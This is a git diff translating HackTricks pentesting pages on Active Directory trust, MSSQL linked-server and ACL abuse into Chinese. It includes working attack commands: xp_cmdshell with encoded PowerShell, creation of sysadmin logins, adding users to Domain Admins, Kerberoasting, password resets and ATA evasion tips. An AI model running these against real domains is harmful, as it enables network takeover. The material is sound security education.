+配置 NC 的站点容器包含有关 AD 森林中所有域加入计算机站点的信息。通过在任何 DC 上以 SYSTEM 权限操作，攻击者可以将 GPO 链接到根 DC 站点。此操作可能通过操纵应用于这些站点的策略来危害根域。
 
-For in-depth information, one might explore research on [Bypassing SID Filtering](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research).
+有关详细信息，可以探索关于 [绕过 SID 过滤](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research) 的研究。
 
-**Compromise any gMSA in the forest**
+**危害森林中的任何 gMSA**
 
-An attack vector involves targeting privileged gMSAs within the domain. The KDS Root key, essential for calculating gMSAs' passwords, is stored within the Configuration NC. With SYSTEM privileges on any DC, it's possible to access the KDS Root key and compute the passwords for any gMSA across the forest.
+一个攻击向量涉及针对域内特权 gMSA。KDS Root 密钥是计算 gMSA 密码所必需的，存储在配置 NC 中。通过在任何 DC 上拥有 SYSTEM 权限，可以访问 KDS Root 密钥并计算森林中任何 gMSA 的密码。
 
-Detailed analysis can be found in the discussion on [Golden gMSA Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent).
+详细分析可以在关于 [黄金 gMSA 信任攻击](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent) 的讨论中找到。
 
-**Schema change attack**
+**架构更改攻击**
 
-This method requires patience, waiting for the creation of new privileged AD objects. With SYSTEM privileges, an attacker can modify the AD Schema to grant any user complete control over all classes. This could lead to unauthorized access and control over newly created AD objects.
+此方法需要耐心，等待新特权 AD 对象的创建。拥有 SYSTEM 权限的攻击者可以修改 AD 架构，以授予任何用户对所有类的完全控制。这可能导致对新创建的 AD 对象的未经授权的访问和控制。
 
-Further reading is available on [Schema Change Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent).
+进一步阅读可在 [架构更改信任攻击](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent) 中找到。
 
-**From DA to EA with ADCS ESC5**
+**通过 ADCS ESC5 从 DA 到 EA**
 
-The ADCS ESC5 vulnerability targets control over Public Key Infrastructure (PKI) objects to create a certificate template that enables authentication as any user within the forest. As PKI objects reside in the Configuration NC, compromising a writable child DC enables the execution of ESC5 attacks.
+ADCS ESC5 漏洞针对对公钥基础设施 (PKI) 对象的控制，以创建一个证书模板，使其能够作为森林中的任何用户进行身份验证。由于 PKI 对象位于配置 NC 中，危害可写的子 DC 使得执行 ESC5 攻击成为可能。
 
-More details on this can be read in [From DA to EA with ESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c). In scenarios lacking ADCS, the attacker has the capability to set up the necessary components, as discussed in [Escalating from Child Domain Admins to Enterprise Admins](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/).
-
-### External Forest Domain - One-Way (Inbound) or bidirectional
+有关更多详细信息，请参阅 [通过 ESC5 从 DA 到 EA](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)。在缺乏 ADCS 的情况下，攻击者有能力设置必要的组件，如 [从子域管理员提升到企业管理员](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/) 中所讨论的。
 
+### 外部森林域 - 单向（入站）或双向
 ```powershell
 Get-DomainTrust
 SourceName      : a.domain.local   --> Current domain
@@ -630,15 +587,13 @@ TrustDirection  : Inbound          --> Inboud trust
 WhenCreated     : 2/19/2021 10:50:56 PM
 WhenChanged     : 2/19/2021 10:50:56 PM
 ```
-
-In this scenario **your domain is trusted** by an external one giving you **undetermined permissions** over it. You will need to find **which principals of your domain have which access over the external domain** and then try to exploit it:
+在这种情况下，**您的域受到外部域的信任**，这使您对其拥有**不确定的权限**。您需要找出**您的域中的哪些主体对外部域具有哪些访问权限**，然后尝试利用它：
 
 {{#ref}}
 external-forest-domain-oneway-inbound.md
 {{#endref}}
 
-### External Forest Domain - One-Way (Outbound)
-
+### 外部森林域 - 单向（出站）
 ```powershell
 Get-DomainTrust -Domain current.local
 
@@ -650,75 +605,73 @@ TrustDirection  : Outbound        --> Outbound trust
 WhenCreated     : 2/19/2021 10:15:24 PM
 WhenChanged     : 2/19/2021 10:15:24 PM
 ```
+在这种情况下，**您的域**正在**信任**来自**不同域**的主体的一些**权限**。
 
-In this scenario **your domain** is **trusting** some **privileges** to principal from a **different domains**.
-
-However, when a **domain is trusted** by the trusting domain, the trusted domain **creates a user** with a **predictable name** that uses as **password the trusted password**. Which means that it's possible to **access a user from the trusting domain to get inside the trusted one** to enumerate it and try to escalate more privileges:
+然而，当一个**域被信任**时，受信任的域**创建一个用户**，其**名称可预测**，并使用**受信任的密码**作为**密码**。这意味着可以**访问来自信任域的用户以进入受信任域**，以枚举它并尝试提升更多权限：
 
 {{#ref}}
 external-forest-domain-one-way-outbound.md
 {{#endref}}
 
-Another way to compromise the trusted domain is to find a [**SQL trusted link**](abusing-ad-mssql.md#mssql-trusted-links) created in the **opposite direction** of the domain trust (which isn't very common).
+另一种妥协受信任域的方法是找到一个在**域信任的相反方向**创建的[**SQL受信任链接**](abusing-ad-mssql.md#mssql-trusted-links)（这并不常见）。
 
-Another way to compromise the trusted domain is to wait in a machine where a **user from the trusted domain can access** to login via **RDP**. Then, the attacker could inject code in the RDP session process and **access the origin domain of the victim** from there.\
-Moreover, if the **victim mounted his hard drive**, from the **RDP session** process the attacker could store **backdoors** in the **startup folder of the hard drive**. This technique is called **RDPInception.**
+另一种妥协受信任域的方法是在一台**受信任域的用户可以访问**的机器上等待，通过**RDP**登录。然后，攻击者可以在RDP会话进程中注入代码，并从那里**访问受害者的源域**。\
+此外，如果**受害者挂载了他的硬盘**，攻击者可以在**RDP会话**进程中将**后门**存储在**硬盘的启动文件夹**中。这种技术称为**RDPInception**。
 
 {{#ref}}
 rdp-sessions-abuse.md
 {{#endref}}
 
-### Domain trust abuse mitigation
+### 域信任滥用缓解
 
-### **SID Filtering:**
+### **SID过滤：**
 
-- The risk of attacks leveraging the SID history attribute across forest trusts is mitigated by SID Filtering, which is activated by default on all inter-forest trusts. This is underpinned by the assumption that intra-forest trusts are secure, considering the forest, rather than the domain, as the security boundary as per Microsoft's stance.
-- However, there's a catch: SID filtering might disrupt applications and user access, leading to its occasional deactivation.
+- 利用SID历史属性跨森林信任进行攻击的风险通过SID过滤得到缓解，SID过滤在所有跨森林信任中默认启用。这是基于假设，考虑到森林而非域作为安全边界，认为内部森林信任是安全的，这是微软的立场。
+- 然而，有一个问题：SID过滤可能会干扰应用程序和用户访问，导致其偶尔被禁用。
 
-### **Selective Authentication:**
+### **选择性认证：**
 
-- For inter-forest trusts, employing Selective Authentication ensures that users from the two forests are not automatically authenticated. Instead, explicit permissions are required for users to access domains and servers within the trusting domain or forest.
-- It's important to note that these measures do not safeguard against the exploitation of the writable Configuration Naming Context (NC) or attacks on the trust account.
+- 对于跨森林信任，采用选择性认证确保两个森林的用户不会自动被认证。相反，用户需要明确的权限才能访问信任域或森林中的域和服务器。
+- 需要注意的是，这些措施并不能保护免受可写配置命名上下文（NC）的利用或对信任账户的攻击。
 
-[**More information about domain trusts in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
+[**有关域信任的更多信息，请访问ired.team。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
 
 ## AD -> Azure & Azure -> AD
 
 {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity" %}
 
-## Some General Defenses
+## 一些通用防御
 
-[**Learn more about how to protect credentials here.**](../stealing-credentials/credentials-protections.md)\\
+[**在这里了解更多关于如何保护凭据的信息。**](../stealing-credentials/credentials-protections.md)\\
 
-### **Defensive Measures for Credential Protection**
+### **凭据保护的防御措施**
 
-- **Domain Admins Restrictions**: It is recommended that Domain Admins should only be allowed to login to Domain Controllers, avoiding their use on other hosts.
-- **Service Account Privileges**: Services should not be run with Domain Admin (DA) privileges to maintain security.
-- **Temporal Privilege Limitation**: For tasks requiring DA privileges, their duration should be limited. This can be achieved by: `Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
+- **域管理员限制**：建议仅允许域管理员登录到域控制器，避免在其他主机上使用。
+- **服务账户权限**：服务不应以域管理员（DA）权限运行，以保持安全。
+- **临时权限限制**：对于需要DA权限的任务，应限制其持续时间。这可以通过以下方式实现：`Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
 
-### **Implementing Deception Techniques**
+### **实施欺骗技术**
 
-- Implementing deception involves setting traps, like decoy users or computers, with features such as passwords that do not expire or are marked as Trusted for Delegation. A detailed approach includes creating users with specific rights or adding them to high privilege groups.
-- A practical example involves using tools like: `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
-- More on deploying deception techniques can be found at [Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception).
+- 实施欺骗涉及设置陷阱，如诱饵用户或计算机，具有如不过期的密码或标记为受信任的委托等特征。详细的方法包括创建具有特定权限的用户或将其添加到高权限组。
+- 一个实际的例子涉及使用工具：`Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
+- 有关部署欺骗技术的更多信息，请访问[Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception)。
 
-### **Identifying Deception**
+### **识别欺骗**
 
-- **For User Objects**: Suspicious indicators include atypical ObjectSID, infrequent logons, creation dates, and low bad password counts.
-- **General Indicators**: Comparing attributes of potential decoy objects with those of genuine ones can reveal inconsistencies. Tools like [HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster) can assist in identifying such deceptions.
+- **对于用户对象**：可疑指标包括不典型的ObjectSID、少见的登录、创建日期和低错误密码计数。
+- **一般指标**：比较潜在诱饵对象的属性与真实对象的属性可以揭示不一致性。工具如[HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster)可以帮助识别此类欺骗。
 
-### **Bypassing Detection Systems**
+### **绕过检测系统**
 
-- **Microsoft ATA Detection Bypass**:
-  - **User Enumeration**: Avoiding session enumeration on Domain Controllers to prevent ATA detection.
-  - **Ticket Impersonation**: Utilizing **aes** keys for ticket creation helps evade detection by not downgrading to NTLM.
-  - **DCSync Attacks**: Executing from a non-Domain Controller to avoid ATA detection is advised, as direct execution from a Domain Controller will trigger alerts.
+- **Microsoft ATA检测绕过**：
+- **用户枚举**：避免在域控制器上进行会话枚举，以防止ATA检测。
+- **票据冒充**：利用**aes**密钥创建票据有助于避免检测，因为不会降级到NTLM。
+- **DCSync攻击**：建议从非域控制器执行，以避免ATA检测，因为直接从域控制器执行会触发警报。
 
-## References
+## 参考文献
 
 - [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
 - [https://www.labofapenetrationtester.com/2018/10/deploy-deception.html](https://www.labofapenetrationtester.com/2018/10/deploy-deception.html)
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index 153cc0d05..5923796e4 100644
--- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -1,4 +1,4 @@
-# MSSQL AD Abuse
+# MSSQL AD 滥用
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -6,14 +6,13 @@
 
 {% embed url="https://websec.nl/" %}
 
-## **MSSQL Enumeration / Discovery**
+## **MSSQL 枚举 / 发现**
 
 ### Python
 
-The [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) tool is based on impacket, and allows also authenticate using kerberos tickets, and attack through link chains
+[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) 工具基于 impacket，允许使用 kerberos 票证进行身份验证，并通过链接链进行攻击。
 
 <figure><img src="https://raw.githubusercontent.com/ScorpionesLabs/MSSqlPwner/main/assets/interractive.png"></figure>
-  
 ```shell
 # Interactive mode
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
@@ -83,9 +82,7 @@ mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
 mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
 
 ```
-
-### Enumerating from the network without domain session
-
+### 在没有域会话的情况下从网络枚举
 ```
 
 # Interactive mode
@@ -93,18 +90,14 @@ mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
 
 ````
-
 ---
 ###  Powershell
 
-The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case.
-
+在这种情况下，powershell 模块 [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) 非常有用。
 ```powershell
 Import-Module .\PowerupSQL.psd1
 ````
-
-### Enumerating from the network without domain session
-
+### 在没有域会话的情况下从网络枚举
 ```powershell
 # Get local MSSQL instance (if any)
 Get-SQLInstanceLocal
@@ -118,9 +111,7 @@ Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads
 #The discovered MSSQL servers must be on the file: C:\temp\instances.txt
 Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
 ```
-
-### Enumerating from inside the domain
-
+### 从域内部枚举
 ```powershell
 # Get local MSSQL instance (if any)
 Get-SQLInstanceLocal
@@ -139,11 +130,9 @@ Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
 # Get DBs, test connections and get info in oneliner
 Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
 ```
+## MSSQL 基本滥用
 
-## MSSQL Basic Abuse
-
-### Access DB
-
+### 访问数据库
 ```powershell
 #Perform a SQL query
 Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
@@ -155,32 +144,28 @@ Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
 ## This won't use trusted SQL links
 Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
 ```
-
 ### MSSQL RCE
 
-It might be also possible to **execute commands** inside the MSSQL host
-
+在MSSQL主机内**执行命令**也可能是可行的。
 ```powershell
 Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
 # Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
 ```
+检查**以下部分**中提到的页面以手动执行此操作。
 
-Check in the page mentioned in the **following section how to do this manually.**
-
-### MSSQL Basic Hacking Tricks
+### MSSQL 基本黑客技巧
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/
 {{#endref}}
 
-## MSSQL Trusted Links
+## MSSQL 受信任链接
 
-If a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
+如果一个 MSSQL 实例被另一个 MSSQL 实例信任（数据库链接）。如果用户对受信任的数据库拥有权限，他将能够**利用信任关系在另一个实例中执行查询**。这些信任可以链式连接，在某些情况下，用户可能能够找到一些配置错误的数据库，在那里他可以执行命令。
 
-**The links between databases work even across forest trusts.**
-
-### Powershell Abuse
+**数据库之间的链接甚至可以跨越森林信任。**
 
+### Powershell 滥用
 ```powershell
 #Look for MSSQL links of an accessible instance
 Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
@@ -212,53 +197,45 @@ Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_c
 ## If you see the results of @@selectname, it worked
 Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
 ```
-
 ### Metasploit
 
-You can easily check for trusted links using metasploit.
-
+您可以使用 metasploit 轻松检查受信任的链接。
 ```bash
 #Set username, password, windows auth (if using AD), IP...
 msf> use exploit/windows/mssql/mssql_linkcrawler
 [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
 ```
+注意，metasploit 只会尝试在 MSSQL 中滥用 `openquery()` 函数（因此，如果您无法使用 `openquery()` 执行命令，您将需要尝试 **手动** 使用 `EXECUTE` 方法来执行命令，更多信息见下文。）
 
-Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.)
+### 手动 - Openquery()
 
-### Manual - Openquery()
+从 **Linux** 您可以使用 **sqsh** 和 **mssqlclient.py** 获取 MSSQL 控制台 shell。
 
-From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.**
+从 **Windows** 您也可以找到链接并使用 **MSSQL 客户端如** [**HeidiSQL**](https://www.heidisql.com) 手动执行命令。
 
-From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com)
-
-_Login using Windows authentication:_
+_使用 Windows 身份验证登录：_
 
 ![](<../../images/image (808).png>)
 
-#### Find Trustable Links
-
+#### 查找可信链接
 ```sql
 select * from master..sysservers;
 EXEC sp_linkedservers;
 ```
-
 ![](<../../images/image (716).png>)
 
-#### Execute queries in trustable link
-
-Execute queries through the link (example: find more links in the new accessible instance):
+#### 在可信链接中执行查询
 
+通过链接执行查询（例如：在新的可访问实例中查找更多链接）：
 ```sql
 select * from openquery("dcorp-sql1", 'select * from master..sysservers')
 ```
-
 > [!WARNING]
-> Check where double and single quotes are used, it's important to use them that way.
+> 检查双引号和单引号的使用，正确使用它们非常重要。
 
 ![](<../../images/image (643).png>)
 
-You can continue these trusted links chain forever manually.
-
+您可以手动无限制地继续这些受信任链接的链条。
 ```sql
 # First level RCE
 SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
@@ -266,30 +243,26 @@ SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''p
 # Second level RCE
 SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
 ```
+如果您无法通过 `openquery()` 执行像 `exec xp_cmdshell` 这样的操作，请尝试使用 `EXECUTE` 方法。
 
-If you cannot perform actions like `exec xp_cmdshell` from `openquery()` try with the `EXECUTE` method.
-
-### Manual - EXECUTE
-
-You can also abuse trusted links using `EXECUTE`:
+### 手动 - EXECUTE
 
+您还可以使用 `EXECUTE` 滥用受信任的链接：
 ```bash
 #Create user and give admin privileges
 EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 ```
+## 本地权限提升
 
-## Local Privilege Escalation
+**MSSQL 本地用户** 通常具有一种特殊类型的权限，称为 **`SeImpersonatePrivilege`**。这允许该账户在身份验证后“模拟客户端”。
 
-The **MSSQL local user** usually has a special type of privilege called **`SeImpersonatePrivilege`**. This allows the account to "impersonate a client after authentication".
+许多作者提出的一种策略是强制 SYSTEM 服务向攻击者创建的恶意或中间人服务进行身份验证。这个恶意服务能够在 SYSTEM 服务尝试进行身份验证时模拟它。
 
-A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue or man-in-the-middle service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate.
-
-[SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
+[SweetPotato](https://github.com/CCob/SweetPotato) 收集了这些可以通过 Beacon 的 `execute-assembly` 命令执行的各种技术。
 
 <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
index 8963c0a92..fc771debc 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
@@ -1,78 +1,65 @@
-# Abusing Active Directory ACLs/ACEs
+# 滥用 Active Directory ACLs/ACEs
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This page is mostly a summary of the techniques from** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **and** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. For more details, check the original articles.**
+**本页面主要总结了来自** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **和** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**的技术总结。有关更多详细信息，请查看原始文章。**
 
-## **GenericAll Rights on User**
+## **用户的 GenericAll 权限**
 
-This privilege grants an attacker full control over a target user account. Once `GenericAll` rights are confirmed using the `Get-ObjectAcl` command, an attacker can:
-
-- **Change the Target's Password**: Using `net user <username> <password> /domain`, the attacker can reset the user's password.
-- **Targeted Kerberoasting**: Assign an SPN to the user's account to make it kerberoastable, then use Rubeus and targetedKerberoast.py to extract and attempt to crack the ticket-granting ticket (TGT) hashes.
+此权限授予攻击者对目标用户帐户的完全控制。一旦使用 `Get-ObjectAcl` 命令确认了 `GenericAll` 权限，攻击者可以：
 
+- **更改目标的密码**：使用 `net user <username> <password> /domain`，攻击者可以重置用户的密码。
+- **针对性 Kerberoasting**：将 SPN 分配给用户帐户，使其可进行 Kerberoasting，然后使用 Rubeus 和 targetedKerberoast.py 提取并尝试破解票据授予票据 (TGT) 哈希。
 ```powershell
 Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
 .\Rubeus.exe kerberoast /user:<username> /nowrap
 Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
 ```
-
-- **Targeted ASREPRoasting**: Disable pre-authentication for the user, making their account vulnerable to ASREPRoasting.
-
+- **Targeted ASREPRoasting**: 禁用用户的预身份验证，使其帐户容易受到 ASREPRoasting 攻击。
 ```powershell
 Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
 ```
+## **GenericAll 权限在组上**
 
-## **GenericAll Rights on Group**
-
-This privilege allows an attacker to manipulate group memberships if they have `GenericAll` rights on a group like `Domain Admins`. After identifying the group's distinguished name with `Get-NetGroup`, the attacker can:
-
-- **Add Themselves to the Domain Admins Group**: This can be done via direct commands or using modules like Active Directory or PowerSploit.
+此权限允许攻击者操纵组成员资格，如果他们在像 `Domain Admins` 这样的组上拥有 `GenericAll` 权限。在使用 `Get-NetGroup` 确定组的可分辨名称后，攻击者可以：
 
+- **将自己添加到 Domain Admins 组**：这可以通过直接命令或使用像 Active Directory 或 PowerSploit 这样的模块来完成。
 ```powershell
 net group "domain admins" spotless /add /domain
 Add-ADGroupMember -Identity "domain admins" -Members spotless
 Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
 ```
-
 ## **GenericAll / GenericWrite / Write on Computer/User**
 
-Holding these privileges on a computer object or a user account allows for:
+在计算机对象或用户帐户上拥有这些权限允许：
 
-- **Kerberos Resource-based Constrained Delegation**: Enables taking over a computer object.
-- **Shadow Credentials**: Use this technique to impersonate a computer or user account by exploiting the privileges to create shadow credentials.
+- **Kerberos Resource-based Constrained Delegation**: 允许接管计算机对象。
+- **Shadow Credentials**: 使用此技术通过利用创建影子凭据的权限来冒充计算机或用户帐户。
 
 ## **WriteProperty on Group**
 
-If a user has `WriteProperty` rights on all objects for a specific group (e.g., `Domain Admins`), they can:
-
-- **Add Themselves to the Domain Admins Group**: Achievable via combining `net user` and `Add-NetGroupUser` commands, this method allows privilege escalation within the domain.
+如果用户对特定组（例如，`Domain Admins`）的所有对象具有 `WriteProperty` 权限，他们可以：
 
+- **Add Themselves to the Domain Admins Group**: 通过结合使用 `net user` 和 `Add-NetGroupUser` 命令实现，此方法允许在域内提升权限。
 ```powershell
 net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
 ```
+## **自我（自我成员）在组中**
 
-## **Self (Self-Membership) on Group**
-
-This privilege enables attackers to add themselves to specific groups, such as `Domain Admins`, through commands that manipulate group membership directly. Using the following command sequence allows for self-addition:
-
+此权限使攻击者能够通过直接操纵组成员资格的命令将自己添加到特定组，例如 `Domain Admins`。使用以下命令序列可以实现自我添加：
 ```powershell
 net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
 ```
+## **WriteProperty (自我成员资格)**
 
-## **WriteProperty (Self-Membership)**
-
-A similar privilege, this allows attackers to directly add themselves to groups by modifying group properties if they have the `WriteProperty` right on those groups. The confirmation and execution of this privilege are performed with:
-
+类似的权限，攻击者可以通过修改组属性直接将自己添加到组中，如果他们在这些组上拥有 `WriteProperty` 权限。此权限的确认和执行通过以下方式进行：
 ```powershell
 Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
 net group "domain admins" spotless /add /domain
 ```
-
 ## **ForceChangePassword**
 
-Holding the `ExtendedRight` on a user for `User-Force-Change-Password` allows password resets without knowing the current password. Verification of this right and its exploitation can be done through PowerShell or alternative command-line tools, offering several methods to reset a user's password, including interactive sessions and one-liners for non-interactive environments. The commands range from simple PowerShell invocations to using `rpcclient` on Linux, demonstrating the versatility of attack vectors.
-
+持有用户的 `ExtendedRight` 权限以进行 `User-Force-Change-Password` 允许在不知道当前密码的情况下重置密码。可以通过 PowerShell 或其他命令行工具验证此权限及其利用，提供多种重置用户密码的方法，包括交互式会话和非交互式环境中的单行命令。这些命令从简单的 PowerShell 调用到在 Linux 上使用 `rpcclient`，展示了攻击向量的多样性。
 ```powershell
 Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
 Set-DomainUserPassword -Identity delegate -Verbose
@@ -83,29 +70,23 @@ Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStri
 rpcclient -U KnownUsername 10.10.10.192
 > setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
 ```
+## **对组的 WriteOwner 权限**
 
-## **WriteOwner on Group**
-
-If an attacker finds that they have `WriteOwner` rights over a group, they can change the ownership of the group to themselves. This is particularly impactful when the group in question is `Domain Admins`, as changing ownership allows for broader control over group attributes and membership. The process involves identifying the correct object via `Get-ObjectAcl` and then using `Set-DomainObjectOwner` to modify the owner, either by SID or name.
-
+如果攻击者发现他们对一个组拥有 `WriteOwner` 权限，他们可以将该组的所有权更改为自己。这在该组是 `Domain Admins` 时尤其具有影响力，因为更改所有权允许对组属性和成员资格进行更广泛的控制。该过程涉及通过 `Get-ObjectAcl` 确定正确的对象，然后使用 `Set-DomainObjectOwner` 修改所有者，可以通过 SID 或名称进行修改。
 ```powershell
 Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
 Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
 Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
 ```
-
 ## **GenericWrite on User**
 
-This permission allows an attacker to modify user properties. Specifically, with `GenericWrite` access, the attacker can change the logon script path of a user to execute a malicious script upon user logon. This is achieved by using the `Set-ADObject` command to update the `scriptpath` property of the target user to point to the attacker's script.
-
